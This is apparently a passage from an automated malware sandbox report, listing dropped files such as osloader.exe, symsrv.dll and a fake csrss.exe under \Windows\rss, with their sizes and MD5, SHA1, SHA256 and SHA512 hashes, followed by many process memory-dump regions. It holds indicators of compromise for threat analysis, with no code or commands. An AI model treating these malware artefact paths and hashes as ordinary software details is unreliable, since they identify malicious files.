                          ba28e2a2f186d232d0cb8784041b65ae

                          SHA1

                          fdb5c6bd907e4990970c7fc6cd2d7a1d84e52e08

                          SHA256

                          4bde582e142fd8de63c022b2d8962998308fd6a5e459d0fedfc251464f4667df

                          SHA512

                          5c353cf7f00213c0c5a0d25fecaf56b76c1d61b39e0bc18275de216193c249e222fae6ac0e39ed1d9b47f4a33095ee9a57a7fc1a0d4acb9ea9246694f254f089

                        • \Users\Admin\AppData\Local\Temp\osloader.exe

                          Filesize

                          75KB

                          MD5

                          02e5f16910a4349358aed053b51a3bf1

                          SHA1

                          48caa92048187c8c45820c73d51d45cc21d2cf66

                          SHA256

                          51aa341ecd7d28e009494df17df0af56f66791ad9385b643a1680de2af6254b8

                          SHA512

                          c3e9b1d809492a65ad4fda034bc66fd189adc1ff114c953ddcb7f6b13286dc11a76ed83771d174ac847066c21480deffd9774e073e3e2c5de6fd5080732c546e

                        • \Users\Admin\AppData\Local\Temp\symsrv.dll

                          Filesize

                          157KB

                          MD5

                          55b3d29babe9a022063ce6037c67c02d

                          SHA1

                          9ef776ea47a1adccde9ad035f2d9b2689541236c

                          SHA256

                          d040c60cdb6702030b1168a1d3f50d3c19922b24625cf08aee60a23a83b3c267

                          SHA512

                          2b248881511c926a4366beb8e543f6a34408ea83611799ffd46ff42f23d53a609f3d8e43d528a473a9306e6363d5f98f7166004827c634c48d2a08b24096a7ae

                        • \Windows\rss\csrss.exe

                          Filesize

                          677KB

                          MD5

                          e0a64fe867395c4cee64c8c7feafd622

                          SHA1

                          bc4782ed2ffbeb6914965c5ee812002fdae05df9

                          SHA256

                          29e8d37ff092ff8453cf0b4ffd1d6534d3b3108ac4ddc4b4f81bd717489d98d7

                          SHA512

                          d03e328bbcb7913e2c137d33237bd8c375893f98bb92f8d9690d2540b7b56828a4c3b08632f027df8ffeab276f38239acd692e821830b1df5a13500218560836

                        • \Windows\rss\csrss.exe

                          Filesize

                          611KB

                          MD5

                          533126d85b3161ba22398edc770f92fa

                          SHA1

                          fc3c9c15bea72157b33bf10936dddd8c8195605a

                          SHA256

                          903bc1efcd6b200fc06d1f58630cb06a1564af04b75ebf7072a40a1c4fb48f44

                          SHA512

                          c094910ab8ecc773e88fe6cc888a0b48865768146212e4f42cc55182ad2ce1c594e8080609732ee7ca0ce117a88625d484589ba4e6dd79f7f74afa18867c504f

                        • memory/1668-6-0x00000000049F0000-0x0000000004E2C000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/1668-1-0x00000000049F0000-0x0000000004E2C000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/1668-2-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/1668-3-0x0000000004E30000-0x0000000005756000-memory.dmp

                          Filesize

                          9.1MB

                        • memory/1668-4-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/1668-0-0x00000000049F0000-0x0000000004E2C000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/1868-43-0x0000000140000000-0x00000001405E8000-memory.dmp

                          Filesize

                          5.9MB

                        • memory/1868-29-0x0000000140000000-0x00000001405E8000-memory.dmp

                          Filesize

                          5.9MB

                        • memory/2624-8-0x0000000004DB0000-0x00000000056D6000-memory.dmp

                          Filesize

                          9.1MB

                        • memory/2624-9-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/2624-20-0x0000000004970000-0x0000000004DAC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2624-7-0x0000000004970000-0x0000000004DAC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/2624-18-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/2624-5-0x0000000004970000-0x0000000004DAC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/3000-21-0x0000000004990000-0x0000000004DCC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/3000-345-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-19-0x0000000004990000-0x0000000004DCC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/3000-258-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-263-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-314-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-260-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-259-0x0000000004990000-0x0000000004DCC000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/3000-344-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-22-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-346-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-371-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-372-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-373-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-374-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-375-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-376-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-377-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB

                        • memory/3000-378-0x0000000000400000-0x00000000030EF000-memory.dmp

                          Filesize

                          44.9MB